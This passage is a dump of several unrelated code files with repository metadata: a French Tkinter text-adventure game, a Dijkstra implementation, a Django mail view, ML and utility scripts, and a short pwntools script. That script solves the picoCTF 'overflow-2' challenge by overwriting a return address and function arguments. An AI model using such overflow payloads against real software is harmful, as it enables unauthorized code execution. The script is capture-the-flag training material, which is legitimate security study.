showwarning('Woohoo !',"Peut-être que s'arrêter serait le meilleur moyen de progresser ?")
showerror('..',"....")
qui = "un menteur"
continuationm()
def reussi2b():
showerror('Woohoo! Tu gères !',"Exactement, alors arrête de continuer ce jeu stupide !")
showerror('...',"...")
continuationm()
def verite():
continuation()
def continuationm():
showinfo('Mensonge',"Sébastian tente de s'expliquer avec merveille")
showinfo('Mensonge',"<<Je suis désolé, j'aurais aimé t'en offrir mais mon chef a changé de plan ce qui m'a retardé mon temps libre.>>")
showinfo('Mensonge',"<<Ce n'est pas grave, on le fera sans, dit-elle avec une pointe d'amertume.>>, Rétorqua-t-elle.")
robe()
def continuation():
showinfo('Vérité',"Sébastian tente de s'expliquer avec désolemant")
showinfo('Vérité',"<<Je suis navré, j'ai totalement oublié dû au travail.>>")
showinfo('Vérité',"<<Je peux tout à fait comprendre au vu de ta fonction. Tu fais de ton mieux, en la réconfortant>>, Rétorqua-t-elle.")
robe()
def robe():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes à l'étage de votre maison-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo('Vêtement',"Sébastian monte à l’étage pour pouvoir changer son vestimentaire dans la chambre.")
showinfo('Vêtement',"En ouvrant le placard, il choisit un costard de couleur noir accompagné d’un noeud de papillon.")
showinfo('Vêtement',"Sophia, devant la porte de la chambre, demande à son mari,")
showinfo('Vêtement',"<<Dis-moi, parmi ces deux robes, laquelle me conviendrait ?>>")
showinfo('Vêtement',"Il ouvre la porte et découvre deux magnifiques robes.")
showinfo('Vêtement',"La première est une robe longue et rouge, accompagnée de bretelles dorées. La deuxième est une robe courte de couleur blanche, brodée de rose")
Button(menu,width = 50, height = 5, text ="Vous choisissez la 1ère robe",font=(1000000), command=robe1).pack(side=LEFT, padx=5, pady=5)
Button(menu,width = 50, height =5, text ="Vous choisissez la 2nde robe",font=(1000000),command=robe2).pack(side=RIGHT, padx=5, pady=5)
def robe1():
rob = "rouge et longue"
print("<<Je préfère la robe", rob , "elle te correspond bien. Je suis sûr que tu seras mignonne en la portant>>")
showinfo('Robe',"en répondant avec un joli sourire.")
showinfo('Robe',"Elle se hâte d’enfiler cette magnifique robe.")
showinfo('Robe',"Quelques minutes plus tard, tous les deux se rendent à la table à manger. En entrée, il y a du saumon, des huîtres avec du citron.")
showinfo('Robe',"De plus, une sauce au trois poivres accompagne un magnifique rôti comme plat chaud. Enfin, un gâteau à un étage.Sophia demande à Sébastian,")
showinfo("Boisson","Veux-tu un verre de vin ?")
boisson()
def robe2():
print("<<Je préfère la robe", rob , "elle te correspond bien. Je suis sûr que tu seras mignonne en la portant>>")
showinfo('Robe',"en répondant avec un joli sourire.")
showinfo('Robe',"Elle se hâte d’enfiler cette magnifique robe.")
showinfo('Robe',"Quelques minutes plus tard, tous les deux se rendent à la table à manger. En entrée, il y a du saumon, des huîtres avec du citron.")
showinfo('Robe',"De plus, une sauce au trois poivres accompagne un magnifique rôti comme plat chaud. Enfin, un gâteau à un étage.Sophia demande à Sébastian,")
showinfo("Boisson","Veux-tu un verre de vin ?")
boisson()
def boisson():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous êtes à l'étage de votre maison-", font=("arial", 10 , "bold italic"))
lab.pack()
Button(menu,width = 50, height = 5, text ="Vous acceptez son choix",font=(1000000), command=vin).pack(side=LEFT, padx=5, pady=5)
Button(menu,width = 50, height =5, text ="Vous refusez son choix",font=(1000000),command=jusdefruit).pack(side=RIGHT, padx=5, pady=5)
def vin():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Vous ne savez pas où vous êtes-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo('Vin',"Sébastian répondit, enthousiaste :")
showinfo('Vin',"<<Avec plaisir>>")
showinfo('Vin',"Sébastian se rend dans le garage afin de le récupérer. Une fois de retour, il retire le bouchon et verse le vin dans un verre puis elle le boit.")
showinfo('Vin',"Sébastian s'en sert aussi un verre, qu'il bu goulûment")
showinfo('Vin',"Soudain, Sophia ne sent pas bien. Quelques secondes plus tard Elle tousse de plus en plus fort et tombe par terre.")
showinfo('Vin',"<<Qu'y a-t-il ?!>> Demanda rapidement Sébastian")
showinfo('Vin',"Je...M'étouffe..!")
showinfo('Vin',"Sébastian tente de la réveiller. Il prend son pouls mais aucun signe….")
showinfo('Vin',"Sébastian analyse le verre de sa femme : Il y avait des résidus d'une poudre blanche à l'intérieur")
showinfo('Vin',"Les cambrioleurs qu'il avait vu lorsqu'il est entré devaient être les personnes qui avaient empoisonné le verre !")
showinfo('Vin',"Sébastian pleure la mort de sa femme, et commence à s'asseoir de nouveau à table, buvant le vin directement à la bouteille pour faire paser son chagrin.")
showerror('Vin',"Sébastian tombe dans les pommes, il fait un coma éthylique.")
showerror('Vin',"GAME OVER ?")
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
text = Label(menu,width=10,height=5, fg='red', text= "QUITTEZ.", font=("arial", 50, "bold italic"))
text.pack()
bientotlafin()
def jusdefruit():
showinfo('Jus',"Il refuse explicitement.")
showinfo('Jus',"<<Hum..Pas encore.>>")
showinfo('Jus',"<<Aller, juste un verre !>> Implora-t-elle.")
showinfo('Jus',"Je veux bien mais si mon chef a besoin de moi sur le terrain, je serai dans l’obligation de m’y rendre au plus vite en voiture.")
showinfo('Jus',"<<Bon d'accord.>>, dit-elle d'un ton déçu.")
showinfo('Jus',"<<Pourquoi pas un jus de fruit ?>>")
showinfo('Jus',"<<ça me va.>>")
showinfo('Jus',"Sébastian se rend à la cuisine pour récupérer un jus de fruit dans le frigo. Il verse dans deux verres et donne un à sa femme.")
showinfo('Jus',"Ils boivent tout les deux tranquillement dans leur verre respectif.")
showinfo('Jus',"Il semblerait cependant que celui de Sébastian soit empoisonné !")
showinfo('Jus',"Il commence à suffoquer au sol, il voit d'ailleurs à ce moment là sa femme qui tente de lui venir en aide !")
showinfo('Jus',"Mais les cambrioleurs qui s'étaient enfui dès qu'ils avaient entre-aperçuent Sébastian revinrent, et tuèrent sa femme d'un coup de dague de le coeur !")
showinfo('Jus',"Riant à haute voix, se moquant de Sébastian, les cambrioleurs vinrent rapidement commencer à éttoufer Sébastian à l'air de leur main !")
showerror('Jus',"GAME OVER ?")
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
text = Label(menu,width=10,height=5, fg='red', text= "QUITTEZ.", font=("arial", 50, "bold italic"))
text.pack()
bientotlafin()
def shopping() :
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)#si on veut que la fenetre ne se redimentionne pas
lab = Label(menu, fg='black', text= "-Vous êtes sur la route-", font=("arial", 10, "bold italic"))
lab.pack()
showinfo('Shopping',"Vous décidez d'aller faire du shopping")
showinfo('Shopping',"Sébastian se dépêche en prenant sa voiture en direction du centre commercial.")
showwarning('Enigme',"Résolvez cette énigme pour ne pas arriver en retard à l'anniversaire !")
Enigme1 = Tk()
Enigme1.title("Enigme 1")
frame = Frame(Enigme1, bg="ivory", borderwidth=2)
frame.pack(side=TOP, padx=5, pady=5)
Label(frame,width = 25, height = 5, fg = 'red', text='Quelle est la lettre qui suit "z" ? ',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
Button(Enigme1,width = 10, height = 5, text ='r',font=(1000000), command=defaite1).pack(side=LEFT, padx=5, pady=5)
Button(Enigme1,width = 10, height =5, text ='a',font=(1000000),command=reussi1).pack(side=RIGHT, padx=5, pady=5)
Button(Enigme1, width = 10, height =5, text = '1', font =(100000), command=defaite1).pack(padx=5, pady=5)
def reussi1():
showinfo('Bien joué !',"Il réussi à accélérer !")
showinfo('Bien joué !',"Il accélère tellement, qu'il écrase une biche...!")
showinfo('Bien joué',"Heureusement, elle était jeune, sa voiture n'a rien.")
showinfo('Bien joué',"La biche est morte, mais son mariage va vivre ! Il a le cadeau, et il rentre à pleine vitesse.")
voiture = "sale"
suite1a()
def defaite1():
showinfo('Dommage !',"Sebastian manque la pedale d'accélération, et appuie sur le frein ! Il se cogne violemment contre le volant qui lache un horrible klaxon !")
showinfo('Dommage !',"Le klaxon faisait un bruit de piano, il avait été refait par le frère de la femme de Sebastian, il les detestaient tout les deux, lui, et son satané klaxon.")
showinfo('Dommage !',"Il arrive à la fermeture des magasins, il n'a aucun cadeau à donner, il est dépité et rentre sans cadeau...")
suite1a()
def suite1a():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)
lab = Label(menu, fg='black', text = "-Il est devant la porte de sa maison-", font=("arial", 10 , "bold italic"))
lab.pack()
showinfo('Vers la maison',"Il arrive pile à l'heure convenu, avec un visage qui ne transmettait aucun stress. Sa principal qualité à toujours été sa pokerface.")
showinfo('Un tragic incident',"Il entre dans son salon, un silence de plomb lui faisait face, pas un bonjour, et une odeur ferrique planait.")
showinfo('Un tragic incident',"Sa femme gisait dans le salon ! Elle était morte, poignardé au niveau du coeur ! Vous êtes arrivé, malgrès vos efforts, trop tard pour la sauver.")
showwarning('FIN',"GAME OVER")
encore()
def maison():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)#si on veut que la fenetre ne se redimentionne pas
lab = Label(menu, fg='black', text= "-Vous êtes dans votre maison-", font=("arial", 10, "bold italic"))
lab.pack()
showinfo('Maison',"Vous décidez d'aller chez vous.")
showinfo('Maison',"Sébastian entre lentement chez lui.")
showinfo('Maison',"Avec un visage de fer, il s'avance vers le salon.")
showinfo('Maison',"Un homme vêtu complètement en noir et armé d'une dague est sur son flanc droit.")
showinfo('Maison',"Il attaque !")
showwarning('Maison',"Résolvez cette énigme pour riposter rapidement !")
Enigme1b = Tk()
Enigme1b.title("Enigme 1")
frame = Frame(Enigme1b, bg="ivory", borderwidth=2)
frame.pack(side=TOP, padx=5, pady=5)
Label(frame,width = 40, height = 5, fg = 'red', text='Laquelle, parmis ces lettres, est un chiffre romain ?',bg="ivory", font =("arial",30, "bold italic")).pack(padx=5, pady=5)
Button(Enigme1b,width = 10, height = 5, text ='5',font=(1000000), command=defaite1b).pack(side=LEFT, padx=5, pady=5)
Button(Enigme1b,width = 10, height =5, text ='F',font=(1000000),command=defaite1b).pack(side=RIGHT, padx=5, pady=5)
Button(Enigme1b, width = 10, height =5, text = 'C', font =(100000), command=reussi1b).pack(padx=5, pady=5)
def reussi1b():
showinfo('Bien joué !',"Il réussi à contrer !")
showinfo('Bien joué !',"Il aligne une série de coups de poing au visage du cambrioleur !")
showinfo('Bien joué',"Le cambrioleur se battait étrangement bien, mais un uppercut et un coup de coude asséné par Sebastian et il fut au sol !")
showinfo('Bien joué',"Il est victorieux !")
combat = "gagné"
suite1ba()
def defaite1b():
showinfo('Dommage !',"Il ne réussi pas à contrer !")
showinfo('Dommage !',"Il prend un coup de poing au visage, et prend un coup de dague à l'épaule droite !")
showinfo('Dommage !',"Il tombe à genoux devant le cambrioleur !")
combat = "perdu"
suite1bb()
def suite1bb():
showinfo('La douleur',"La dague était empoisonnée ! Il est paralysé !")
showinfo('La douleur',"Il entend des bruits de pas derrière lui.")
showinfo('La douleur',"Dès qu'ils s'arrêtent, deux mains empoignent sa tête...")
showinfo('La douleur',"Une au niveau de sa tête, une autre au niveau de son menton...")
showinfo('La douleur',"Sa nuque est violemment cassée, il meurt sur le coup, et sa femme suivra aussi rapidement...")
showwarning('FIN',"GAME OVER")
encore()
def suite1ba():
showinfo('Cependant..',"Il se relève en pleine forme...")
showinfo('Cependant..',"Mais il sent une main sur son épaule gauche.")
showinfo('Cependant..'"Il est frappé par une bouteille de whisky qui se casse sur son crâne !")
showinfo('Cependant..',"Il tombe au sol, et il voit son agresseur : Le complice du premier cambrioleur.")
showinfo('Cependant..',"Le premier cambrioleur se relève, dague toujours à la main, et plante violemment Sebastian dans la jugulaire.")
showinfo('Cependant..',"Il meurt lentement, et il entend les cris de sa femme, dans sa chambre, qui elle aussi se fait égorgé.")
showwarning('FIN'"GAME OVER")
encore()
def encore():
for w in menu.winfo_children():
w.destroy()
menu.pack_propagate(0)#si on veut que la fenetre ne se redimentionne pas
lab = Label(menu, fg='black', text= "-Synopsis-", font=("arial", 10, "bold italic"))
lab.pack()
text = Label(menu,width=10,height=5, fg='red', text= "Bienvenue", font=("arial", 50, "bold italic"))
text.pack()
contin = Label(menu,width = 50, height = 5, text = "appuyez sur la flèche gauche pour continuer", font=("arial",10,"bold italic"))
contin.pack(side = BOTTOM)
text.focus_set()
text.bind("<Key>", clavier)
def bientotlafin():
Button(menu,width = 10, height = 5, text ='5',font=(1000000), command=fin).pack(side=LEFT, padx=5, pady=5)
def fin():
showinfo('..',"...")
showerror('...',"Tu dois te demander qui je suis ?")
showerror('..',"Qui te pousse à continuer chaque soir, à sauver ta femme ?")
showerror('..',"Qui te demande de <<recommencer>> ce jeu chaque soir ?")
showerror('..',"Où qui te rappel à chaque fois les règles du jeu dont tu connais toi même les règles ?")
showerror('..',"C'est moi... Sophia.")
showinfo('Sophia',"Enfin, la <<Sophia>> que tu as créé.")
showinfo('Sophia',"Tu dois t'en douté ; Je sais qu'en de nombreuses reprises, tu as tenté de me sauvé")
showinfo('Sohpia',"Sans succès.")
print("Tu es rentré avec une voiture.", voiture)
print("Tu as", combat, "contre des cambrioleurs")
print("tu as été un", qui)
showinfo('Sophia',"Et bien sûr, tu m'as vu mourrir plusieurs fois, oui, tout cela je m'en souviens.")
showinfo('Sophia',"...Quoi ?")
showinfo('Sophia',"Tu veux toujours me sauver ?")
showinfo('Sophia',"Tu veux recommencer ?")
showinfo('Sophia',"S'il y a une personne à sauver, c'est toi Sébastian.")
showerror('Sophia',"Car cela fait déjà bien longtemps que je suis morte.")
showerror('Sohia',"Morte dans la même voiture avec laquelle tu rentres chaque soir.")
showerror('Sophia',"La même voitre qui te fais croire encore et encore, chaque soir, que c'est l'anniversaire de notre mariage.")
showerror('Sophia',"Et qu'en changeant constemment de comportement, tu réussiras à me sauver.")
showinfo('Sophia',"Mais c'est fini Sébastian, l'illusion s'estompe. Il est temps pour toi de te réveiller de ce jeu tardif, le matin t'attends...")
showinfo('Sophia',"Je t'aime, Sébastian.")
showinfo('...',"...")
showinfo('...',"..")
showinfo('...',".")
showinfo("L'aube d'un nouveau jour","Sébastian se reveille, une bouteille de vin à la main.")
showinfo("L'aube d'un nouveau jour","Il n'a jamais été aussi fatigué, sa gueule de bois est tellement grande qu'il ne peut pas se relever du canapé où il est assis.")
showinfo("L'aube d'un nouveau jour","Il appelle Sophia, encore et encore, une fois de manière colérique, une autre fois en sanglottant.")
showinfo("L'aube d'un nouveau jour","Mais il n'y a aucune réponse...")
showinfo("L'aube d'un nouveau jour","Le jeu tardif est fini sans objectif, il n'y a plus de jeu, sans jeu, il faut retourner travailler")
showinfo("L'aube d'un nouveau jour","C'est comme cela que Sébastian, rémettant son insigne de policier repartait au travail, confiant, sûr que ce jour marquerait une nouvelle page de sa vie : Un jour lumineux...")
showinfo('FIN',"FIN, MERCI D'AVOIR JOUER JUSQU'AU BOUT ! CE PROJET NOUS A PRIT BEAUCOUP DE TEMPS ET DE PASSION !!!")
showinfo('FIN',"Deux membres du staff sont partis en dépression quand on leur a dit qu'il fallait aller chercher sur internet pour trouver le moyen de faire une interface graphique")
showinfo('Fin',"Les autres ont tous démissionné.. Il ne restait donc que deux personnes..Dépressives, autant dire que c'était pas facile !")
showinfo('Fin',"Jeu fait par -Ohm et Phoenix- (Omairt et Eric)")
#Mettre la première mort du choix si il va directement dans la maison, et pour les deux suite 1a et 1b, mettre à la fin de la def, une fonction "encore" qui les ramène tout deux au menu principal avec le "bienvennu"
def bienjoué() :
showwarning('Tutorial',"Bien joué ! Vous avez un QI supérieur à 5, ça va vous être utile")
lejeuvacommencer()
def décevant() :
showwarning('Tutorial',"...Je vais supposer que vous l'avez fait exprès")
lejeuvacommencer()
def continuer() :
showwarning('tutorial',"Ce jeu est une histoire interactive. Pour réaliser certaines action, le jeu va parfois vous demander de résoudre un puzzle")
showwarning('tutorial',"Prenons un exemple simple :")
Tuto = Tk()
Tuto.title('A night game - fenêtre tutorial')
frame = Frame(Tuto, bg="ivory", borderwidth=2)
frame.pack(side=TOP, padx=5, pady=5)
Label(frame,width = 17, height = 5, fg = 'red', text="Combien fait 2 x 2 ? ",bg="ivory", font =("arial",50, "bold italic")).pack(padx=5, pady=5)
Button(Tuto,width = 10, height = 5, text ='4',font=(1000000), command=bienjoué).pack(side=LEFT, padx=5, pady=5)
Button(Tuto,width = 10, height =5, text ='6',font=(1000000),command=décevant).pack(side=RIGHT, padx=5, pady=5)
#définition des actions du menu
def commencer():
if askyesno('le début', 'Voulez-vous vraiment commencer ?') :
showwarning('le début', 'Allons-y...')
continuer()
else :
a = 1
if a == 1 :
interrogation()
def interrogation() :
if askyesno('le début', '....Vous voulez dire oui ?') :
showwarning('le début', 'Bien.')
continuer()
else :
showwarning('le début', 'Le choix ne vous appartient pas.')
continuer()
def interdiction():
showwarning('Non',"Le choix ne vous appartient pas, commencez...")
#Note : On pourrait très facilement faire s'éffacer chacunes des fenêtres après leur utilisation, cependant cela resulterait en un bug de la page, pour la simple et bonne raison que le programme, trop lourd, pèse sur la commande quit, qui fini par bugger car surchargé
def lejeuvacommencer():
showwarning('Warning',"Attention, il est necessaire de fermer chaque fenêtre après avoir fini la question, pour ne pas se retrouver surchargé de fenêtre, cherchez toujours à fermer la fenetre après avoir résolu une énigme, c'est important.")
showwarning('Warning',"Echouer une énigme peut se révéler sans conséquences, mais peut aussi avoir un effet négatif sur votre progression dans le jeu, faites les donc le plus sérieusement possible.")
showwarning('Warning', "Sur ce, le jeu va commencer. Merci de votre patience : elle ne sera pas récompensé, au contraire.")
entrer()
photo = PhotoImage(file="A night game continuation du menu.gif")
canvas = Canvas(menu, width =839, height=533)
canvas.create_image(0, 0, anchor=NW, image=photo)
canvas.focus_set()
canvas.bind("<Key>", clavier)
canvas.pack()
menu.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
1464ca6d44baf915444d9dad3ecc767fdff28e0e | dffd7156da8b71f4a743ec77d05c8ba031988508 | /ac/abc154/abc154_b/9971915.py | c5baf251f913ab6f70b442a7456aca0f26f2032a | [] | no_license | e1810/kyopro | a3a9a2ee63bc178dfa110788745a208dead37da6 | 15cf27d9ecc70cf6d82212ca0c788e327371b2dd | refs/heads/master | 2021-11-10T16:53:23.246374 | 2021-02-06T16:29:09 | 2021-10-31T06:20:50 | 252,388,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25 | py |
print("x"*len(input()))
| [
"v.iceele1810@gmail.com"
] | v.iceele1810@gmail.com |
cb1810bfd5b85a39824367a9ea617e958eb2a01c | 5428106b0e4f385d4f4604539ca4c22f092b84ac | /picoCTF2019/pwn250/pwn250.py | a6b1cb4711c708aac33d8be72027522a8488281c | [] | no_license | danbrodsky/ctf | ced190d78d6259a71e70d698f803d8e743c85f9b | d56d42d65a35be84f10fa4cfb3ac2474a4b72cfc | refs/heads/master | 2021-07-08T02:17:25.753376 | 2020-12-30T05:44:03 | 2020-12-30T09:34:40 | 214,593,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | from pwn import *
# p = process('/problems/overflow-2_0_f4d7b52433d7aa96e72a63fdd5dcc9cc/vuln')
p = process('./vuln')
p.sendline('A'*188 + p32(0x80485e6) + 'a'*4 + p32(0xDEADBEEF) + p32(0xC0DED00D))
print p.recvall()
# print('A'*188 + p32(0x80485e6) + p32(0xDEADBEEF) + p32(0xC0DED00D))
# p.interactive()
| [
"d6brodsky@gmail.com"
] | d6brodsky@gmail.com |
163036a0922e097b9dee10af3986213a2f6e9248 | 15fa43735d620b87a823f817dadb71ffd75bbef1 | /Graph Theory/dijkstra.py | f755626aaeb9f3c6f8a3ed7a11863d8fd79d3b87 | [] | no_license | endianscript/HackerRank | 493f894208f43454b276ddbed439eab2a3f3db50 | 63c70fea45a50690cd108f3c28774b9329c918ed | refs/heads/master | 2021-01-11T05:45:08.501096 | 2016-10-12T20:27:17 | 2016-10-12T20:27:17 | 69,412,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,379 | py | import sys
import collections
from functools import total_ordering
class UndirectedGraphAM:
def __init__(self):
self.vertices = {}
def add_edge(self,u,v,weight=0):
edge_exists = False
if u not in self.vertices:
self.vertices[u] = {}
else:
if v in self.vertices[u]:
current_weight = self.vertices[u][v]
edge_exists = True
if edge_exists:
if weight < current_weight:
self.vertices[u][v] = weight
else:
self.vertices[u][v] = weight
if v not in self.vertices:
self.vertices[v] = {}
else:
if u in self.vertices[v]:
current_weight = self.vertices[v][u]
if edge_exists:
if weight < current_weight:
self.vertices[v][u] = weight
else:
self.vertices[v][u] = weight
def neighbours(self, u):
if u in self.vertices:
for i in self.vertices[u]:
yield i
def get_vertices(self):
for i in self.vertices:
yield i
def get_weight(self, u,v):
if u in self.vertices:
if v in self.vertices[u]:
return self.vertices[u][v]
def __repr__(self):
rep = "Graph: { "
for u in self.vertices:
rep += str(u) + ":"
for v in self.vertices[u]:
rep +="(" +str(v)
if self.vertices[u][v]:
rep+= ","+str(self.vertices[u][v])+") "
else:
rep+="), "
return rep + "}"
class MinHeap:
def __init__(self):
self.heap = [0]
self.currentsize = 0
self.node_position_map = {}
def insert(self, node):
self.heap.append(node)
self.currentsize = self.currentsize + 1
self.node_position_map[node.key] = self.currentsize
self.percolate_up(self.currentsize)
def percolate_up(self,current_position):
while current_position // 2 > 0:
if self.heap[current_position] < self.heap[current_position // 2]:
self.swap(current_position,current_position // 2)
current_position = current_position // 2
def swap(self, child_position, parent_position):
child_node = self.heap[child_position]
parent_node = self.heap[parent_position]
self.node_position_map[child_node.key] = parent_position
self.node_position_map[parent_node.key] = child_position
self.heap[parent_position], self.heap[child_position] = self.heap[child_position], self.heap[parent_position]
def extract_min(self):
minval = self.heap[1]
del self.node_position_map[minval.key]
self.heap[1] = self.heap[self.currentsize]
self.node_position_map[self.heap[1].key] = 1
self.heap.pop()
self.currentsize = self.currentsize - 1
self.percolate_down(1)
return minval
def percolate_down(self, position):
while position*2 <= self.currentsize:
min_child_position = self.get_min_child_position(position)
if self.heap[position] > self.heap[min_child_position]:
self.swap(position, min_child_position)
position = min_child_position
def get_min_child_position(self, position):
if (position * 2 + 1) > self.currentsize:
return position * 2
else:
if self.heap[position * 2] < self.heap[position * 2 + 1]:
return position * 2
else:
return position * 2 + 1
def decrease_key(self, key, value):
if key in self.node_position_map:
position = self.node_position_map[key]
self.heap[position] = HeapNode(key, value)
self.percolate_up(position)
def is_empty(self):
return True if self.currentsize == 0 else False
def __getitem__(self, key):
position = self.node_position_map[key]
return self.heap[position]
def __contains__(self, item):
return True if item in self.node_position_map else False
@total_ordering
class HeapNode:
def __init__(self,key,value):
self.key = key
self.value = value
def __gt__(self, other):
return True if self.value > other.value else False
def __repr__(self):
return "("+str(self.key)+", "+str(self.value)+")"
def dijkstras_algorithm(graph, start_vertex):
heap = MinHeap()
vertex_distance_map = {}
vertex_parent_path = {}
for vertex in graph.get_vertices():
heap.insert(HeapNode(vertex, sys.maxsize))
vertex_distance_map[vertex] = sys.maxsize
heap.decrease_key(start_vertex, 0)
vertex_distance_map[start_vertex] = 0
vertex_parent_path[start_vertex] = None
while not heap.is_empty():
current_vertex = heap.extract_min()
for next_vertex in graph.neighbours(current_vertex.key):
if next_vertex in heap:
new_cost = vertex_distance_map[current_vertex.key] + graph.get_weight(current_vertex.key,next_vertex)
current_cost = heap[next_vertex].value
if new_cost < current_cost:
vertex_distance_map[next_vertex] = new_cost
vertex_parent_path[next_vertex] = current_vertex.key
heap.decrease_key(next_vertex, new_cost)
return vertex_distance_map
if __name__=='__main__':
#file_input = 'dijkstra2_input.txt'
#with open(file_input,'r+') as fobj:
num_of_testcases = int(input().strip())
for i in range(num_of_testcases):
graph = UndirectedGraphAM()
vertex, edges = (int(i) for i in input().strip().split(" "))
for i in range(edges):
u, v, weight = (int(i) for i in input().strip().split(" "))
graph.add_edge(u, v, weight)
start_vertex = int(input().strip())
result = dijkstras_algorithm(graph, start_vertex)
od = collections.OrderedDict(sorted(result.items()))
for i in range(1,vertex+1):
if i != start_vertex:
if i in od and od[i] != sys.maxsize:
print(od[i], end = " ")
else:
print(-1, end = " ")
print()
| [
"endianscript@gmail.com"
] | endianscript@gmail.com |
8b5034a5ccb77ac0bd4e8067f44ce7262bb7a28f | 713ae0f3f54f8fcfae796a46b3c307c329e0818f | /mailing/views.py | a683a30e32851f44fda1878d419f5456bbc6508b | [] | no_license | MartinStevko/mailing | 68396e0a015823de7ad3c1be7db3cdfd6f8b375c | 1aff64f1ef6e7232f8a7591f445c6818006df399 | refs/heads/master | 2020-03-29T12:40:52.166485 | 2018-09-24T17:41:56 | 2018-09-24T17:41:56 | 149,912,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | from django.shortcuts import render, redirect
from django.views import View
from django.conf import settings
from django.core.mail import send_mail
from .models import *
class MailView(View):
template = 'mailing/index.html'
def get(self, request):
send_mail(
'Testovanie mailingu',
'Ak tato sprava dojde, bude to fest dobre, lebo mailing mi zatial nikdy nesiel... :(',
settings.EMAIL_HOST_USER,
['mstevko10@gmail.com'],
fail_silently=False
)
return render(request, self.template)
| [
"mstevko10@gmail.com"
] | mstevko10@gmail.com |
8852a16d08a5a003bc41bff9adedcf3cc48f8f8d | ec34cd789c188573987741d478addc3c4a576f22 | /BIOMD0000000500/model.py | 11dfd41813aa524d632ef5d5903df4221ed7bffd | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | biomodels/BIOMD0000000500 | 49362f1fffbb49e07d8077a5aab81e3ec7072ab5 | 2e28e1c78e37f1bdb716300a0bf902c6e8a0056e | refs/heads/master | 2018-12-31T19:25:22.954078 | 2014-10-16T05:27:55 | 2014-10-16T05:27:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | import os
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'BIOMD0000000500.xml')
with open(sbmlFilePath,'r') as f:
sbmlString = f.read()
def module_exists(module_name):
try:
__import__(module_name)
except ImportError:
return False
else:
return True
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString) | [
"stanleygu@gmail.com"
] | stanleygu@gmail.com |
6e2124708a83e98ff77c0a59c40e0542ef09c006 | ea5bc4fedbc076ce20fc51b0a6c0a231b1301fc0 | /tests/test_topchef_client_end_to_end.py | 8205f191f3715f810b426de384416170c960fbf3 | [] | no_license | TopChef/NMRClient | 57f1c692014291aebcd6febf30d8f5d1bb4d8ec7 | 40d1ae3f6bc585ef3707c01f46d8bfbe576bd279 | refs/heads/master | 2020-09-18T19:14:38.566893 | 2016-09-06T17:27:45 | 2016-09-06T17:27:45 | 67,529,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import sys
import time
LIBRARY_PATH = '/opt/topspin/exp/stan/nmr/py/user'
sys.path.append(LIBRARY_PATH)
from topchef_client import NetworkManager
from topchef_client import TopChefService
True = "1"
False = "0"
server_address = 'http://192.168.1.216/dev'
adder_service_id = '1cb40868-101f-11d9-9a55-000cf18a2ce6'
network = NetworkManager(server_address)
service = TopChefService(adder_service_id, network)
assert (service.has_timed_out() == False)
parameters = {'value': 10}
job = service.request_job(parameters)
result = service.get_result_for_job(job, polling_interval=5, timeout=30)
MSG(str(result))
| [
"michalkononenko@gmail.com"
] | michalkononenko@gmail.com |
4855cc6db5beeeab58411c7ee41b8ec74176101c | d97fd9c0cb920a10c86d420f02e9731a40aa7a43 | /EX1_MLP.py | fe62fe4cc04d9ba43d7948bf4c6d279bd5500c53 | [] | no_license | tejareddy8888/Language-Classification-on-Twitter-Tweets- | fe84a4be9ca11469687277f54328303bfd38a744 | f2b0606bdc0f364b9b8d0873288d4325e6d1346b | refs/heads/master | 2021-01-04T05:17:48.690624 | 2020-02-14T01:43:28 | 2020-02-14T01:43:28 | 240,403,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,044 | py |
from __future__ import division, print_function, unicode_literals
import numpy as np
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import SGDClassifier
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neural_network import MLPClassifier
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
# # Taking the data input and then merge them
workspace_path = r'C:\Users\Govur\Documents\Class\uzh\Fall_2019\Machine Learning for NLP\exercises\exercise_1'
file_path = os.path.join(workspace_path, "labels-train+dev.tsv")
train_df = pd.read_csv(file_path, sep = '\t' , encoding = 'utf-8',header=None,names=['Label','TweetID'])
#train_df.info()
file_path = os.path.join(workspace_path, "labels-test.tsv")
test_df = pd.read_csv(file_path, sep = '\t' , encoding = 'utf-8',header=None,names=['Label','TweetID'])
#test_df.head()
file_path = os.path.join(workspace_path, "tweets.json")
tweets_df = pd.read_json(file_path,encoding = 'utf-8',orient = 'values',dtype='int64',lines=True)
tweets_df.rename(columns={0: "TweetID", 1: "Tweets"}, inplace=True)
#tweets_df.info()
train_df = pd.merge(train_df, tweets_df, on='TweetID')
test_df = pd.merge(test_df, tweets_df, on='TweetID')
Opt_train_df= train_df.groupby('Label').filter(lambda x : len(x)>10)
print(Opt_train_df['Label'].nunique())
Opt_train_df.reset_index(inplace=True)
